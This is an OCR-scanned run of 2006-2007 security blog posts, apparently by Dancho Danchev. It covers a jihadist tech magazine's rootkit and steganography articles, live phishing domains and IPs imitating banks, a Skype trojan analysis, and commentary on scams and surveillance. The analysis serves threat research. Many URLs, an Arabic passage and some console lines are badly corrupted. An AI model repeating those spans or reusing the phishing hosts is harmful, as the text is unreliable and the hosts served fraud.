Namely, that it's practical compared to theoretical source of 
information, it's targeting mixed audiences, and it's keeping 
it very simple. So I've decided to compile a summary of the 
key sections and topics in the articles covered for future 
references. In one sentence - its simplicity is not to be 
feared, but its practicality. 

The release of the magazine is an indication of the ongoing 
use of the Internet for mass-education - economies of 

scale - through videos and visual howto's, but much more 
advanced information related to information security could 

be obtained from public sources. The cellphone 
triangulation in Iraq, and the demonstration of Hacker 
Defender are worth mentioning, but overall, concepts such 

as information warfare or online PSYOPS remain 
unstructured and 

abstract ideas to the average jihadist - for now. Notice 
the multimedia file used as an example for the alternate data 
stream as well and draw up the conclusions on your own. 

Don't exclude the logical possibility of on purposely 
disinforming the general public and various intel folks across 



the world on a relatively primitive inforwar practices such as 
using PGP and alternate data streams. 
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U:\fa.ij* \hxdeflkll!tr>cii N 
C:N>not stop HackerDsfondorlSS 

The 3crvicc ia not responding to tlic control function. 
Ho re help is available by typing bin HELPIISU 2186. 

G:\>cd lajr 

C:\fajr >cd hxdefl80p 

0:\f ajr \hvdef100r>hxdeflfW.exR :-uninstall 


s '-£ Ojjy 1 nJLaJU coJ 1 J i W ^ua^-7.* 


iijii p yUJLi j ' cJci ijt i-7 » js - •vi^Vw* ^ U £i ( I 
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Here are the articles themselves : 

01. Article One - Alternate Data Streams - steganography 
example given, rootkits - hacker defender covered, examples 
provided, abomosab.jpg used as an example 

02. Article Two - Satellite Communications and the 
importance of GPS, handheld GPS, explains 
triangulation, mentions satellite imagery's power, and 
satellite transfer speeds, mentions 1575 and 1227 as carrier 
frequencies and 

Digital Sequence Spread Specturm - DSSS, mentions 
handheld GPS receiver, includes photos of 3G data card, 











laptop. 

It then discusses a locked device with a "WARNING" sign on it 

03. Article Three - Visual HOWTO on Install VMware 

04. Article Four - Article on digital media players, the 
different formats, subtitles, and the NTSC and PAL systems, 

recording basics as it looks like 

05. Article Five - Introduction to PGP - Zimmerman is 
quoted, explanation of the RSA algorithm, recommending the 
use of PGP Whole Disk, features warning message that trial 
versions of PGP Whole Disk will self-decrypt 

And [10]SITE Institute's comments on the propaganda side in 
the introduction and conclusion : 

" For future issues, the editors urge members of the jihadist 
Internet community to submit articles in the field of 
technology for publishing. They write: "My kind, technical 
Mujahid brother, the magnitude of responsibility which is 
placed upon you is equal to what you know in the regard of 
information. Do not underestimate anything that you know; 
perhaps a small article that you write and publish can benefit 
one Mujahid in the Cause of Allah or can protect a brother of 
yours in Allah. This way you will gain the great reward with 
the permission of Allah. " 

If you perceive the Technical Mujahid magazine as a threat to 
the national security of any country, old issues of 

[lljPhrack magazine must be giving you the nightmares. 

Flave a productive week everyone, and [12]stay informed! 



1. 

https://web.archive.Or g /web/20101016192214/http://l.bp.bl 
oas pQt.com/_wlCH hTiOmrA/RXveMNwu i HI/AAAAAAAAAGO /b 

HYr a Hm8_PO/sl600-h/ste a a_hidin a.i pg 
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2. http://ddanchev.blo as pot.com/2006/09/benefits-of-ooen- 
source-intelli a ence.html 

3. http://www.pcadvisor.co.uk/news/index.cfm7newsid = 7764 

4. 

https://web.archive.Or g /web/20101016192214/httP://www. pc 

world.com/article/id . 128072-c . currentevents/articl 

e.html 

5. 

http://www.centcom.mil/sites/uscentcoml/What%20Extremis 

ts%20Sav/FirstlssueoftheTechnicalMu i ahid.asox?Pa a eVi 

ew=Shared 

6. http://siteinstitute.or g /bin/articles.c ai? 
ID=publications229606&Cate aorv= oublications&Subcate aor 
y=0 


7. http://teaanvma a .arabform.com/ 

8. htto://internet- 

ha a anah.or g /hmedia/teaq n v_ma a l_announce/index.html 

9. 

https://web.archive.Or g /web/20101016192214/httP://www. ao 
oa le.com/search?hl = en&a=teaa n v ma a azinel.zi p 
























































10. http://siteinstitute.or g /bin/articles.c ai? 
ID=publications229606&Cate aorv= publications&Subcate aor 


y=0 


11. http://www.phrack.or g/ 

12. http://del.icio.us/DDanchev 
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Automatically translated text: 
AHTMBMpyCHaa 


Google Translate Hack (2006-12-12 12:35) 

Google seems to have [l]fixed this one already, but trying it 
the other way around you can still feel what BETA is all 
about. My guess is that translations of unknown words or 
combinations better return a clustered result from the Web, 

than no result at all, which is exactly what is happening in 
this case. 

1. http://www.viruslist.com/en/weblo a 7weblo a id = 208187293 
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BuzZzZ Generation (2006-12-12 12:48) 

Just a few of the sites/blogs that have recently featured my 
posts exposing the low lifes : 


Translate Text 

Original text: 

Eugene Kaspersky 


| English to Russian BETA j[] Translate | 



















- Linuxsecurity.com -"[ 1 ]Analysis of the Technical Mujahid - 
Issue One" ; "[2]Current State of Internet Jihad" 

- lnformit.com - "[3]How do terrorists spell rootkit in Farsi?" 

- Defensetech.org - "[4]Rapid fire 1"; "[5]Rapid fire 2" 

- Net-security.org - "[6]Analysis of the Technical Mujahid - 
Issue One" 

- [7]Cyberia.org.il 

Interested in knowing how was Al Qaeda using the Internet 
before 9/11 with all the multimedia released back 

then? Moreover, have you ever wanted to take a peek at 
some of the [8]most recent tools-of-the-trade [9]malware 

authors use on a daily basis? Stay tuned for the Christmas 
Full Disclosure Series summarizing some of my recent 
findings, and beyond! 

[lOJShare your knowledge. It's a way to achieve immortality. 
Dalai Lama 

1. http://www.linuxsecuritv.com/content/view/126179/169/ 

2. http://www.linuxsecuritv.com/content/view/126180/169/ 

3. http://www.informit.com/discussion/index.as p? 
postid = 267d22bb-b27e-4c2b-b3cf- 

Q18e8e2dfl8d&fl = rss&r! = l 

4. http://www.defensetech.or g /archives/003Q51.html 

5. http://www.defensetech.or g /archives/003062.html 

6. http://net-securitv.or g /news. ph p7id = 13033 
















7. http://tech.cvberia.or g .il/?o=121 


8. http://ddanchev.blo as pot.com/2006/ll/nuclear- a rabber- 
tcolkit.html 


9. http://ddanchev.blo as pot.com/2006/Q4/wild-wild- 
under a round_25.html 

10. http://www.auatedb.cpm/auates/3045 
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Busy Wednesday (2006-12-14 04:12) 

Wednesday, Wednesday, sc [l]gccd tc blcg. 

1. http://ddanchev.blo as pot.com/20Q6/10/return-on- 
investment-of-blo aaina .html 

30 


£ 


Terrorism Cartoon Contest (2006-12-14 04:21) 

Why is it that even with my extemely well developed sense 
of black humour, I'm still [l]not laughting? Here's another 

contest collection, again hosted by Iran, this time on [2]the 
denial of the Holocaust. Thankfully, my history teacher 

taught me otherwise, and the No Such Agency folks have the 
complete coverage in their indispensable "[3]Eavesdrop-ping 
on Hell : Historical Guide to Western Communications 
Intelligence and the Holocaust 1939-1945". 

1. http://www.irancartoon.com/100/contest/terrorism/ 






















2. http://www.irancartoon.ir/ a allerv/album48? paa e=l 

3. http://www.nsa. g pv/publicatipns/publi00043.pdf 
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Top Ten Scams of 2006 (2006-12-14 04:37) 

CcnsumerAffairs.ccm did a great jcb in summarizing the 
[l]top 10 scams pf 2006 " from the roughly 50,000 consumer 
complaints we've processed in the past yeah'. Here's what 
the gullible consumer complains about: 

01. [2]Fake Lottery Scam 

ConsumerAffairs.com reported on one case in which an [ 3] 
elderly Kansas maniost over $300,000. [4]You should have 
Asked Merrill to point you to the "tickets" with the highest 
probability of success, but it's too late for you now. Baby 
booming gullibility in action. 

02. [5]Phishing-Vishing Scams 

I'm very surprised it's the second and not the first complain, 
but how come? Consumers aren't even aware 

they got scammed at the first place. Do [6]yourself a favour, 
and don't discuss your financial details with automated 

systems. Think before you act, it's like deciding whether to 
enter a singles bar or not. 

03. [7]PhonyJob Scam 

"Any employment offered online without a formal interview, 
no matter where it originates, should be treated 










with skepticism," said Arkansas Attorney General Mike 
Beebe, who investigated one of these scams in 2006. Thank 
you, you've just ruined the entire virtual telecommuting 
concept. I'm aware of another type of scam where fake job 

postings seek to harvest as much personal information from 
applications as possible. [8]Other practices are also used. 

04. [9]Negative Option Scams 

Look for the ASTERISKS, it should be somewhere around the 
FREE proposal. 

05. [10]Nigerian 419 Scams 

People falling into this one, are the type of people suffering 
from the "[lljrich-uncle complex". 

You don't 

know his exact wealth, but you secretly hope that on a sunny 
day a handsome, and of course charging by the minute 
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laywerwill bring the news you've been subconsciously 
expecting your entire life. Think for real and forget about the 
Internet. Would a complete stranger offer you millions of 
dollars because he has no one else to give the money to, 

or cannot open up a bank account for themselves? 

06. [12]Pump & Dump Scam 

Rainer Bohme and Thorsten Holz evaluated [13]the situation. 
07. [14]Bogus Fuel Saving Devices 



Make an analogy with washing powder/tablets/liquid who's 
actively advertised as an "energy saver" due to its 
sophisticated technology that doesn't require hot water, 
when it happens to be a commodity and if you're going to 

be saving energy from it, then you've either watched a movie 
about the Third World, or are very desperate. 

08. [15]Grandparents Scam 

An elderly person is targeted by the scammer who calls and 
says something like, "It's me, grandpa." The elderly person 
will respond, thinking it's one of their grandchildren. 
Unbelieavable, and perhaps another reason to keep in touch 
with your grand-parents more often, so they could at least 
recognize your voice. 

09. [16]Oprah Ticket Scam 

In case you fall victim into this one, you're not just bored to 
the bottom of your brain, but a potential guest at 

Oprah's show with the unique ability to explain how this 
scam ruined your life, but later on helped your meet the 

person of your life, where else if not in an online scam 
discussion group. I feel you. 

10. [17]craigslist Scam 

It's like the Yellow Pages, some postings are so automatically 
generated that they happen to be a waste of 

time, but hopefully not money, so be aware. 

1 . 

http://www.consumeraffairs.com/news04/2006/12/top_ten sc 
ams.html 





2 . 

httD://www.consumeraffairs.com/news04/2006/08/atl antic Jo 
tterv.html 

3. 

http://www.CQnsumeraffairs.com/news04/2006/10/lotterv_sca 
m victim.html 


4. http://askmerrill.ml.com/fa front/1 . 2280 .. 00.html? pg =cn p 

5. 

http://www.consumeraffairs.com/news04/2006/01/cpb_phishi 

ng .html 

6. http://phishtanksitechecker.com/ 

7. 

http://www.consumeraffairs.com/news04/2006/05/career_buil 

din g scam.html 

8. http://www. g oo g le.com/search? 

hl=en&q = %22phone+***%22+%22 + address+*%22 + %22e- 
mail%22 + intitle%3A%22curriculum+ 


vitae%22&btnG=Goo g le+Search 

9. 

http://www.consumeraffairs.com/news04/2005/ne g ative o oti 
on.html 

10 . 

http://www.consumeraffairs.com/news04/2006/07/ni g eria 41 
9.html 


11. http://en.wikipedia.or g /wiki/Scroo g e_McDuck 

12 . 

http://www.consumeraffairs.com/news04/2006/10/pump du 







































m p.html 

13. http://ssrn.com/abstract=897431 

14. 

http://www.consumeraffairs.com/news04/2006/06/tx g as pill 
■ html 

15. 

http://www.consumeraffairs.com/newsQ4/2006/ll/ a randpare 

nts_scam.html 

16. 

http://www.consumeraffairs.com/news04/2006/ll/oprah sea 
m.html 

17. 

http://www.consumeraffairs.com/news04/2006/08/crai a slist s 
cam.html 
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Le Cyber Jihad (2006-12-18 08:20) 

It's very nice to see that Marc Olanie is still keeping track of 
my [l]articles. Here are [2]several more [3]worth [4]Ba- 
belfishing. 

1. http://www.reseaux-telecoms.net/actualites/lire-le-cvber- 
i ihad-fait-trembler-l-ameriaue-15053.html 

2. http://www.reseaux-telecoms.net/actualites/lire-bientot-le- 

virus-et-l-attaaue-d os-on-demand-12182 .html ? p 

i d = 1 

3. http://www.reseaux-telecoms.net/actualites/lire-danchev- 

su r l-achat-cie-fa os-12 7 03.html 7 pid = 6 



























4. http://www.reseaux-telecoms.net/actualites/lire-des- 
truands-des-failles-du-business-13219.html 
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Google and Yahoo's Shareholders Against Censorship 
(2006-12-19 04:46) 

[l]Collective bargaining tends to achieve the necessary echo 
effect : 

" The New York City Pension Fund wants shareholders to 
force Google and Yahoo to refuse Internet censorship 
requests by governments. The fund, which owns nearly $280 
million worth of Google shares and $110 million in Yahoo 
shares, 

filed resolutions for shareholders at the two Internet 
companies to vote on at the next shareholder meetings. The 

resolution states that U.5.-based technology companies "that 
operate in countries controlled by authoritarian governments 
have an obligation to comply with the principles of the 
United Nations Declaration of Human Rights. " 

Go, go, go, shareholders. So that by the time [2]censorship 
ends up where it's [3]most aggressive for the [4]time 

being, we can feel proud of ourselves living in a World 2.0, a 
world in which we all have universal access to the 

collective wisdom of everyone. Wait, that [5]used to be part 
of both, Google's and Yahoo's mission statements [6]once. 

From another perspective, the companies themselves have 
their hands tied by the overal Western world's revenues 




generation greed, and outsourcing inspirations in China's 
booming economy. But pretending it isn't happening is like 

ignoring the existence of the [7]thought police these days. 

1. http://news.com.com/2Q61-10811 3-6143860.html 

2. http://del.icio.us/DDanchev/Censorshi p 

3. http://ddanchev.blo as pot.com/2006/Q6/worlds-internet- 
censorship-map.html 

4. http://ddanchev.blo as pot.com/2006/Q8/chinas-internet- 
censorship-report-2006.html 

5. http://ddanchev.blo as pot.com/2006/01/twisted- 
realitv.html 

6. http://irrepressible.info/static/pdf/FQE-in-china-2006- 
lores.odf 

7. http://en.wikipedia.or a /wiki/Thou a htcrime 
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Phishing Domains Hosting Multiple Phishing Sites 
( 2006 - 12-19 08 : 21 ) 

Well, well, well. What do we got here? Couple of interesting 
domains hosting phishing sites of multiple banks for 

you to take a look at, or at the cached versions to be precise. 
What's worth mentioning is the rise of phishing sites 

using the much more easily and anonymously registered .biz 
; .info ; .name domains. However, the first part of these 


























is related to 211.137.13.131 : 


[1] baldwindy.name 

[2] leqwas.biz 

[3] noosfo.biz 

[4] rsytarai.biz, [5]another one 

Multiple hosting: 

[6] 201.195.156.13 

[7] lugers.biz 

[8] loreta.biz 

[9] tuker.info 

Now, try searching the entire .biz space for M [10]Bank Austria 
Creditanstalt". The good news is that even the average 
[ll]anti-phishing toolbar is capable of detecting these. The 
bad news is that customers aren't currently 

using [12]such toolbars as much as they should. And with 
phishing toolkits lowering the entry barriers in this space 

by making it easy for wannabe phishers to "make an impact", 
we've got an efficient problem to deal with. 

1. htt p://209.85.135.lQ4/search? 

g =cache:OSNfvXE88 8 l :www.53.com.bankin a portal.id84085 
2369.baldwindv.name/sbcb 

confirm/&hl=en&ct=clnk&cd = 3 











2. htt p://209.85.135.104/search? 

g = cache: 7 vz3eFI 01 vQ l : www.53.com.portal.leawas.biz/start pr 
oc.id/+%22211.137 +13 

.131%22&hl=en&ct=clnk&cd=4 
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3. htt p://2Q9.85.135.104/search? 

q =cache:tdtfTC a C7f a I : national .com.au .personal_finance.id9 
9999999999999.noosfo 


■ biz/id71077/+%22lnternet+Bankin a +Confirmation + Proced 
u 

4. htt p://209.85.135.104/search? 

g -cache: rSuVZeRkPsA l : ban kofscotlandhalifax.co.uk .id 99999 
999999999 .noosfo. biz/ 

id0777351/+%22211.137 + 13.13 !%22&hl = en&ct=clnk&cd 

= 5 


5. http://209.85.135.1Q4/search?g = cache:- 
F5fLVf3Mcs l :meine.deutsche- 
bank.de.webob i ects.rsvtarai.biz/dbpbc.woa 

/+%22211.137 + 13.131%22&hl=en&ct=clnk&cd = 9 

6. http://www. a oo a le.com/search? 
g =site:201.195.156.130&hl=en&lr=&filter=0 

7. http://www. a oo a le.com/search? 

g = site:lu o ers.biz&hl=en&lr=&fillter=Q 

8. http://www. a oo a le.com/search? 

q = site:loreta.biz&hl=en&ir=&filter=Q 










































9. http://www. a oo a le.com/search? 
g = site:tukerinfo&hl=en&lr=&filter=Q 


10. http://www. a oo a le.com/search? 

hl=en&lr=&q=site%3Abiz+intitle%3A%22Bank+Austria+Cr 

editanstalt%22 


11. http://ddanchev.blo as pot.com/2006/Q3/anti-phishin a- 
toolbars-can-vou-trust.html 

12. http://www.cvlab.cmu.edu/default.asox7id = 2255 
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Were you Tracking Santa's Location? (2007-01-04 
14:39) 

As usual, [1]N0RAD were, but there's one minor issue to keep 
in mind and that's how during the Christmas and New 

Year holidays Santa Claus is the most successfully targeted 
victim of identity theft. Hopefully they were [2]tracking 


















the real Santa through the real Rudolph as the weakest link : 

" The satellites have infrared sensors, meaning they can 
detect heat. When a rocket or missile is launched, a tremen¬ 
dous amount of heat is produced - enough for the satellites 
to detect. Rudolph's nose gives off an infrared 
signature 

similar to a missile launch. The satellites can detect 
Rudolph's bright red nose with practically no problem. 

With so many years of experience, NORAD has become good 
at tracking aircraft entering North America, detecting 
worldwide 

missile launches and tracking the progress of Santa, thanks 
to Rudolph. " 

All rest is a commodity but attitude. 

1. http://www.noradsanta.or a /en/default. php 

2. http://www.noradsanta.or a /en/how_we_doJt. php 
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Technical Analysis of the Skype Trojan (2007-01-04 
15:00) 

During December yet another trojan started making rounds, 
this time dubbed [l]the Skype trojan - SEO conspiracy. 

Was the trojan exploiting a zero day vulnerability in the 
Skype protocol? Absolutely not, as it was basically using 

Skype's messaging service as a propagation [2]vector, thus, 
the gullible and in a Christmas mood end user was 






still supposed to interact with the malware by clicking on the 
link. And with required end user's interaction, the 

possibilities for major outbreaks were very limited. Perhaps 
the only development worth mentioning is the malware 

author's use of commercial anti-cracking software - [3]NTKrnl 
Secure Suite - to make the unpacking harder, or at 

least theoretically improve the time needed to do so 
compared to using publicly obtainable, and much more 
easily 

detectable packers. 

Two days ago, Nicolas Brulez from Websense Security Labs 
released [4]a technical analysis of the trojan itself, 

and here's your proof for the logical possiblities of specific 
copy'n'paste malware modules : 

11 The main protection scheme I faced was the copy pasted 
from my Honey net Scan of The month 33 Challenge. 

The breakpoint detection was 100 % identicaleven the 
numbers I had generated randomly. More importantly , the 

technique I had written based on SEH + cpuid/rdtsc was also 
copied. The only difference was that they used the EDX 

register to compare the timing. 

Copy pasting protection code without even changing 
it a little, provides no security at all and allowed me 

to unpack it even quicker, (gotta love looking at code you 
wrote 2 years ago) 



It apparently included some other tricks, that made it a little 
harder to unpack, and the file looked like it was 

corrupted at some point. In order to debug it and comment 
my disassembly in a readable way, I opted to use a 

userland debugger, and thus had to write a little shellcode 
for injection into the packed malware. Basically, it entailed 
abusing Windows Exception Handling (using a hook), to get 
past every check. After that, one could attach his favorite 
userland debugger to the malware and eventually find the 
Original Entry Point. Although the imports rebuilding for this 
protector isn't hard at ail, it wasn't mandatory in this 
executable as it only imported one function: ExitProcess" 

And while the average malware coder is using commercial 
tools to make his releases harder to analyze, the 

[5]almighty jihadist is still living in the [6]Hacker Defender 
world. 

1. http://www.websense.com/securitvlabs/blo a /blo a.Dhp? 
Blo a lD=101 

2. http://ddanchev.blo as pot.com/2006/Q6/sk v pe-as-attack- 
vector.html 

3. http://www.ntkrnl.com/products/securesuite/default. php 
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4. http://www.websense.com/securitvlabs/blo a /blo a.php? 
Blo a lD=102 

5. http://ddanchev.blo as pot.com/20Q6/12/analvsis-of- 
technical-mu i ahid-iissue-one.html 


6. http://hxdef.or g/ 
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Foreign Intelligence Services and U.S Technology 
Espionage (2007-01-07 18:20) 

Talking about globalization, like it or not, perceive it as a 
threat to national security or a key economic benefit, it's 
happening and you cannot stop it. Nothing else will add more 
long-term value to a business or a military force than 

innovation, and when it comes to the U.S military's self¬ 
efficiency in R &D, it's pretty evident they've managed to 
achieve the balance and still dictate the rhythm. 

[1] The methods used aren't nothing new : 

11 The report says that foreign spies use a wide variety of 
techniques, ranging from setting up front companies that 
make phony business proposals to hacking computers 
containing information on lasers, missiles and other 

systems. But the most popular methods of attempting to 
obtain information was a simple "informational request" 

(34.2 %) and attempts to purchase the information (32.2 %). 
Attempts were also made using personal relationships, 

searching the Internet, making contacts at conferences and 
seminars, cultural exchanges. 11 

[2] What's new is the actual report in question - 

[3] M Technology Collection Trends in the U.S. Defense Indus¬ 
try". OSINT is also an important trends gathering factor, and 
so is corporate espionage through old-fashioned 


malware [4]approaches or [5]direct intrusions, and it's great 
the report is considering the ease of execution on these and 
the possible network vulnerabilities in the contractors : 

11 DSS also anticipates an increase in suspicious internet 
activity against cleared defense contractors. The potential 
gain from even one successful computer intrusion makes it 
an attractive, relatively lowrisk, option for any country 
seeking access to sensitive information stored on U.S. 
computer networks. The risk to sensitive information on U.S. 

computer systems will increase as more countries develop 
capabilities to exploit those systems. 11 

Then again, what's produced by the U.S but cannot be 
obtained from there, will be from other much more in- 
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secure third-party purchasers - how did [6]Hezbollah got 
hold of night vision gear? Or even worse, by obtaining the 

[7]leftovers from a battle conflict for further clues. 

The bottom line question - is the illegal transfer of U.S 
technology threat higher than the indirect leakage of 

U.S educated students taking their IQ back home, while 
feeling offended by their inability to make an impact were 

they a U.S citizen? 

1. http://www.kommersant.com/ p- 

9797/r 527/intelli a ence g atherin g espiona ge/ 

2 . 

http://www.fas.or a /blo a /secrecv/2007/01/dss views forei g n c 
ollection o.html 












3. http://www.fas.or a/ir D/threat/2006trends.pdf 


4. http://ddanchev.blo as pot.com/2006/09/bi aa est-militar v- 
hacks-of-all-time.html 

5. http://ddanchev.blo as pot.com/2006/Q7/north-koreas- 
c vber-warfare-unit-121.html 

6. http://www.sf a ate.com/c a i-bin/article.c ai? 
fi I e=/c/a/2 006/08/2 0/M NGK9KLVH41.DTL 

7. 

http://www.fas.or a /blo a /secrecv/2006/07/dod manual on tec 
hniicaljntell.html 
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Four Years of Application Pen Testing Statistics 
(2007-01-07 20:24) 

[l]lnvaluable : 

11 The article presents a unique opportunity to take a peek 
into the usually secluded data regarding the actual risk 
posed to Web applications. It shows a constant increase in 
risk level over the four years and an overwhelming overall 
percentage of applications susceptible to information theft 
(over 57 %), direct financial damage (over 22 %), denial of 
service (11 %) and execution of arbitrary code (over 8 %). 

The article analyzes results of first time penetration tests as 
well as repeat tests (retests) in order to evaluate the 
evolution of application security within Web applications over 
time. " 

Lots of figures respecting your busy schedule, and the 
authors' data pointing out how the lack of repeated testing, 




















and the "security as a one time purchase" mentality, actually 
means a false sense of security. Having a secured web 
application doesn't mean the end user won't be susceptible 
to a client side attack, and having a secured end user 

doesn't mean the web application itself will be secured, 
ironic, isn't it? Perhaps prioritizing the platforms to be 
audited, namely [2]the major web properties, could protect 
the always unaware [3]end user to a certain extend - from 
himself. 

[4]Related [5]comments. 

1 . 

htto://www.imoerva.com/a p plication defense center/ oa oers/ 
how_safeJs_it.html 

2. http://www.comscore.com/press/release.as p? press=1152 

3. http://ddanchev.blo as pot.com/2006/Q7/splittin a -botnets- 
bandwidth-capacitv.html 

4. http://ddanchev.blo as pot.com/2006/Q8/malware-statistics- 
on-social.html 

5. http://ddanchev.blo as pot.com/2006/Q5/current-state-of- 
web-a p plication-worms.html 
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Web Economy Buzz Words Generator (2007-01-07 
20:59) 

Whether looking for VC cash, or having a quota to meet 
being a salesman, [ljsome of these may come handy or 
























pretty much make someone's morning. 

Here are my favorite: 

e-enable integrated mindshare 
empower impactful infomediaries 
architect compelling ROI 
productize 24/7 e-services 
recontextualize compelling ROI 

Doesn't matter how well you project your success, if you 
don't have an elevator pitch worth someone's atten¬ 
tion span, than you don't know what you're doing, but 
marely relying on the web economy's state of buzziness - 
this 

is another one. Try some [2]copywriting exercises too. 

1. http://www.dack.com/web/bullshit.html 

2. http://ddanchev.blo as pot.com/2006/Q7/spreadin a- 
ps vcholo a ical-ima a ination.html 
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Sunday's Portion of Hahaha (2007-01-07 21:28) 

While patiently waiting for the future adventures of 
[ljMonica Furious, I came across a nice collection of 
[2]cartoons. 









I'm sure you'll find these two very entertaining - M [3]The 
Disabled Cookies" and M [4]The Spam Prison". 

1. http://leadsalad.com/ 

2. http://www.londonstimes.us/toons/index computers.html 

3. http://www.londonstimes.us/toons/cartoons/displav.html? 
ima a e=Simeon DisabledCookies4. ipg 

4. http://www.londonstimes.us/toons/cartoons/displav.html? 
ima a e=Bennett_prison auvs.i pg 
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Visits to the White House Now Top Secret Information 
(2007-01-07 21:50) 

[ 1 ] 

Informative - White House visitor logs declared top secret: 

" The five-page document dated May 17 declares that all 
entry and exit data on White House visitors belongs to the 
White House as presidential records rather than to the Secret 
Service as agency records. Therefore, the agreement 

states, the material is not subject to public disclosure 
under the Freedom of Information Act. 

In the past, Secret Service logs have revealed the comings 
and goings of various White House visitors, including Monica 

Lewinsky during the Clinton administration. " 

I thought that's always been the case anyway, but it closes a 
loophole that could result in potentially embarrassing 














future developments - or less accountability. Time will show. 
[2]More info. 

1 . 

http://www.chron.com/disp/storv.m pl/ politics/4450956.html 

2. http://www.firstamendmentcenter.or g /news.aspx? 
id = 17981 
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Russia's Lawful Interception of Internet 
Communications (2007-01-08 21:54) 

Don't fool yourself, they've [l]been doing it for the time 
being, now they're legalizing it - working for anything like 
the EFF in Russia means having the bugs in your place 
bugged. [2]Citing Cyber-Terrorism Threat, Russia Explores 

Internet Controls : 

" An estimated 20 percent of the Russian population now has 
access to the Internet. Whereas the Putin admin¬ 
istration exerts tight control over the major domestic 
broadcast and print media, it does not currently restrict the 
content of Internet sites on a wide scale. Web sites such as 
Gazeta.ru and Lenta.ru provide many of the articles 

and commentary that would normally otherwise appear in an 
opposition press. Several wealthy Russians living in 

political exile, including Boris Berezovsky and Vladimir 
Gusinsky, own Russian-language websites that publicize their 
anti-Putin views to Russian audiences. In August 2006, 









Russian right-wing extremists used the Internet to coordinate 
a bomb attack against illegal migrants from Asia. " 

Give me an excuse for [3]data retention? No, give me 
another one besides the infamous "if you don't have 

anything to hide then why worry"? We all have things to 
hide, and things we don't want others to know, that's 

still called my privacy, and since when does this became a 
terrorist activity, or someone's just piggybacking on 

the overall paranoia created by the thought to be acting as 
government watchdog, media - don't be a reporter, 

be a journalist! Winning the public support in different 
countries largely relies on the local attitudes towards the 

key buzzwords - terrorists are using the Net as a "safe 
heaven", and child pornographers are operating online, 
while people are unemployed and primitive deceases which 
should been dealth with years are a second economic 

priority, next to your first one - fighting your (political 
campaign) demons, or the (upcoming budget 
allocation) 

demons you put so much efforts into making me 
believe in. Start from the basics, why retain everyone's 
data, and intercept everyone's communications while 
forgetting that information is all about interpretation? How 
come you're 

assuming - if you're even considering it - that such a neatly 
centralized databases of private information would be 

protected from insiders, even outsiders which will inevitably 
be tempted to having access to such a database? A 



country's intelligence is the government's tool for protecting 
the national security or beyond, but over-empowering 

the watchers is so shortsighted, you'd better break through 
your black'n'white world only and start considering all 

other colours as equal. Don't slip on your values. 

If you sacrifice privacy for security, you don't deserve both of 
them, and the utopian idea of having a 100 % 

successful law enforcement as the panacea of dealing of 
crime reminds of a quote I recently find myself repeating 

very often - make sure [4]what you wish for, so it [5]doesn't 
actually happen. 

1. http://ddanchev.blo as pot.com/2006/Q4/catchin a-u p-on- 
how-to-lawfullv_12.html 

2. http://worldPoliticswatch.com/article.aspx?id=416 

3. http://www.dataretentionisnosolution.com/ 

4. http://en.wikipedia.or g /wiki/Thou a htcrime 
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5. http://en.wikipedia.or a /wiki/Nineteen Ei aht v-Four 
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Iran Bans Purchase of Foreign Satellite Data (2007- 
01-08 22:53) 


[l]Re-inventing the wheel : 



















" According to the bill, a copy of which has been sent to all 
ministries, organizations, state and revolutionary institutions, 
the purchase of information from foreign sources is deemed 
against the law. Specialists of the Defense Ministry have 
currently succeeded in initiating a project for obtaining 
satellite information online. For the first time in Iran, it is now 
possible to produce topographic maps, on a scale of 
1/10,000, of a specific area for municipal and developmental 
projects, with the satellite images of very high resolution. " 

Guess they don't want others to know which locations of 
their country are still unknown to themselves, but 

with the bill definitely implemented as a national security 
measure, and to improve the nation's self-esteem, drop a 

line if they ever get close to producing such [2]high- 
resolution image of their [3]Natanz facility on their own. 

1. http://en a lish.farsnews.com/newstext. php? 
nn=8510170172 

2 . 

http://www.ceip.or g /files/pro i ects/n p p/resources/ima a es/iran/ 

natanz. l PG 

3. http://www.isis- 

online.or a /ima a es/iran/iranjma a ejndex.html 
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Insider Sentiments around L.A's Traffic Light System 
(2007-01-10 00:03) 

Rember how the [l]Hollywood Hackers were winning time 
while heading straight to Grand Central Station in NYC to 

















outsmart the Plague's plan to cause a worldwide ecological 
disaster and cash in between? In pretty much the same 

fashion - without the randomization of traffic lights - [2]two 
engineers in between their union's strike seems to have 
watched the movie too : 

11 They didn't shut the lights off, city transportation sources 
said. Rather, the engineers allegedly programmed them so 
that red lights would be extremely long on the most 
congested approaches to the intersections, causing 

gridlock for several days starting Aug. 21, they said. 11 

Whether overal paranoia due to the sensitive nature of the 
workers' positions and the publicly stated intentions, 

insider sentiments prevail from my point of view. 

1. http://www.imdb.com/Title7Q113243 

2. http://www.latimes.com/news/local/la-me- 

trafficl i a hts9 i an09 .0. 7005 703 .storv?col I = la-home-local 
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Data Mining Credit Cards for Child Porn Purchases 
(2007-01-10 00:14) 

22 million customers had the [l]privacy of their credit card 
purchasing histories breached for the sake of coming up 

with 322 suspects while looking for transactions to a single 
child porn web site - ingenious, absolutely ingenious : 









" In the case under investigation, police were aware of a 
child pornography Web site outside of Germany that 

was attracting users inside the country And they asked the 
credit-card companies to conduct a database search 

narrowed to three criteria: a specific amount of money, a 
specific time period and a specific receiver account. 11 

I don't want to ruin the effect of the effort here, but why do 
you still believe child porn is located on the 

WWW, in the http:// field you're so obsessed with? Is the 
WWW the only content distribution vector for multimedia 

files you're aware of? Try the [2]lnternet Relay Chat, the 
concept of Fserve to be precise. Having found the low lifes 
who buy child porn over the Web is like picturing a pothead 
as the uber-dealer to meet your quotas, namely, efforts 

like these have absolutely no effect on the overal [3]state of 
child pornography online. It's the wrong way to fight the war. 
Put the emphasis on fighting the very production process - 
trafficking of children - not the distribution one. 

1. http://vro.slashdot.or a /article.ol?sid = 07/01/09/1833244 

2. http://www.usenet-replaver.com/faa/uk.le a al.html 

3. 

http://www.redbarnet.dk/Files/Filer/Ra p porter/Position pa oer_ 
2004. pdf 
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Still Living in the Perimeter Defense World (2007-01- 
10 00:19) 












Whereas you'd better break out of the [l]budget-allocation 
myopia and consider [2]prioritizing your security 

investments, [3]decreased spending on information security 
in certain regions means good old-fashioned malware 

and spam floods for the rest of regions doing it: 

11 Fewer small- and medium-sized enterprises (SMEs) in 
Taiwan will increase their spending on information security 
this year compared with fast year, according to a report 
released Thursday by the Institute for Information 

Industry's Market Intelligence Center (MIC). The report said 
that only 12.9 percent of SMEs will increase their 

information security spending in 2007, compared with 16.2 
percent in 2006. 11 

Perimeter defense and host security is like the ABC of 
security, but since viruses and network attacks are 

"taken care of" all seems fine - you wish. 

11 While more than 90 percent of SMEs have installed anti¬ 
virus software and firewall devices, only 11 percent have 
